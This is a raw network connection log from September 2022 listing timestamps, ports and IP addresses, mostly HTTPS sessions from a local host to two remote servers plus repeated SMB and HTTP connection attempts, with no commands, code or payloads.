Sep 29, 2022 14:50:09.156821012 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.157165051 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.157282114 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.157319069 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.157399893 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.157399893 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.157426119 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159533024 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159559965 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159620047 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159648895 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159750938 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.159750938 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.159765959 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159852028 CEST	443	49726	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:09.159957886 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.159957886 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:09.161705017 CEST	49726	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:10.177781105 CEST	49728	445	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:10.433981895 CEST	49734	445	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:10.510998011 CEST	49735	80	192.168.2.6	192.168.2.1
Sep 29, 2022 14:50:11.270260096 CEST	49737	139	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:13.221209049 CEST	49728	445	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:13.596288919 CEST	49734	445	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:13.612076998 CEST	49735	80	192.168.2.6	192.168.2.1
Sep 29, 2022 14:50:14.393230915 CEST	49737	139	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:14.869277954 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:14.869343042 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:14.869431973 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:14.869982958 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:14.869996071 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:14.913733006 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:14.918245077 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:14.918318033 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:15.104332924 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:15.104433060 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:15.104509115 CEST	443	49744	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:15.104779005 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:15.104814053 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:15.105607986 CEST	49744	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:15.106724024 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.106784105 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.106892109 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.107532978 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.107559919 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.150302887 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.160808086 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.160839081 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392076015 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392261028 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392319918 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392327070 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.392357111 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392426968 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.392441988 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392497063 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392543077 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.392553091 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392661095 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392709970 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.392716885 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392731905 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.392811060 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.392826080 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.393248081 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.393332005 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.393347025 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.396300077 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.396344900 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.396404028 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.396428108 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.396449089 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.396481037 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.408746958 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.408787012 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.408906937 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.408936024 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.411195993 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.411243916 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.411349058 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.411381960 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.411397934 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.412611008 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.412642002 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.412710905 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.412734985 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.412776947 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.414588928 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.414624929 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.414691925 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.414715052 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.414738894 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.423219919 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.423254967 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.423330069 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.423357010 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.423377037 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.424894094 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.424946070 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.424989939 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.425014019 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.425035000 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.426002026 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.426031113 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.426107883 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.426129103 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.426148891 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.427726984 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.427767992 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.427839994 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.427860975 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.427875996 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.428487062 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.428519011 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.428586960 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.428606033 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.428623915 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.429567099 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.429613113 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.429658890 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.429680109 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.429697037 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.430293083 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.430387020 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.430401087 CEST	443	49745	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:15.430496931 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:15.430948973 CEST	49745	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:19.221834898 CEST	49728	445	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:19.613058090 CEST	49735	80	192.168.2.6	192.168.2.1
Sep 29, 2022 14:50:20.393671036 CEST	49737	139	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:21.902618885 CEST	49690	443	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:21.919708014 CEST	443	49690	23.50.106.206	192.168.2.6
Sep 29, 2022 14:50:21.919747114 CEST	443	49690	23.50.106.206	192.168.2.6
Sep 29, 2022 14:50:21.919828892 CEST	49690	443	192.168.2.6	23.50.106.206
Sep 29, 2022 14:50:28.913455963 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.913507938 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.913615942 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.914062023 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.914079905 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.954142094 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.968149900 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.968187094 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.988039017 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.988157988 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.988240957 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.988254070 CEST	443	49746	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:28.988312960 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.989449978 CEST	49746	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:28.990489960 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:28.990556002 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:28.990655899 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:28.991329908 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:28.991369009 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.037108898 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.045599937 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.045644045 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.224934101 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225086927 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225176096 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225265980 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.225303888 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225471973 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225539923 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.225558043 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225657940 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.225732088 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.225745916 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.226210117 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.226298094 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.226319075 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.226376057 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.226386070 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.227013111 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.227058887 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.227091074 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.227116108 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228204966 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228279114 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228336096 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.228362083 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228382111 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.228466034 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228533983 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228589058 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.228604078 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.228734016 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.229315996 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.230079889 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.230115891 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.230148077 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.230154991 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.230181932 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.230200052 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.230911016 CEST	443	49747	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:29.231005907 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:29.233753920 CEST	49747	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:34.918983936 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:34.919066906 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:34.919190884 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:34.919593096 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:34.919615030 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:34.966368914 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:34.974948883 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:34.974996090 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:35.175749063 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:35.175858974 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:35.175941944 CEST	443	49754	140.82.121.4	192.168.2.6
Sep 29, 2022 14:50:35.175978899 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:35.176014900 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:35.201380014 CEST	49754	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:50:35.202347994 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.202403069 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.202481985 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.202826023 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.202861071 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.241030931 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.297909021 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.297944069 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.481759071 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.481879950 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.481930017 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.481978893 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.482023954 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.482024908 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.482073069 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.482098103 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.482124090 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.482549906 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.482662916 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.482712984 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.482724905 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.482988119 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.483057976 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.483071089 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.483804941 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.483865023 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.483886003 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.483900070 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.483941078 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.484461069 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.484551907 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.484627008 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.484637976 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.485232115 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.485291004 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.485302925 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.485321045 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.485361099 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.485934019 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.486044884 CEST	443	49755	185.199.108.133	192.168.2.6
Sep 29, 2022 14:50:35.486104012 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:50:35.613599062 CEST	49755	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.669995070 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.670051098 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.670154095 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.670885086 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.670908928 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.713506937 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.741868019 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.741898060 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.761236906 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.761389971 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.761507988 CEST	443	49759	140.82.121.4	192.168.2.6
Sep 29, 2022 14:51:24.761550903 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.761639118 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.763989925 CEST	49759	443	192.168.2.6	140.82.121.4
Sep 29, 2022 14:51:24.765325069 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.765378952 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.765485048 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.765937090 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.765954018 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.806094885 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.813513041 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.813560009 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836656094 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836729050 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836765051 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836797953 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836839914 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836846113 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.836875916 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836884975 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.836893082 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.836931944 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.837202072 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.837239027 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.837270021 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.837292910 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.837316036 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.837333918 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.838059902 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.838128090 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.838143110 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.841100931 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.841134071 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.841207027 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.841232061 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.841290951 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.853169918 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.853197098 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.853389978 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.853389978 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.853420973 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.855776072 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.855808020 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.855921030 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.855921030 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.855967045 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.857657909 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.857701063 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.857753992 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.857793093 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.857812881 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.867144108 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.867185116 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.867304087 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.867368937 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.867393017 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.868202925 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.868223906 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.868318081 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.868346930 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.870086908 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.870177984 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.870193958 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.870222092 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.870260000 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.871180058 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.871201992 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.871330976 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.871352911 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.872133970 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.872165918 CEST	443	49760	185.199.108.133	192.168.2.6
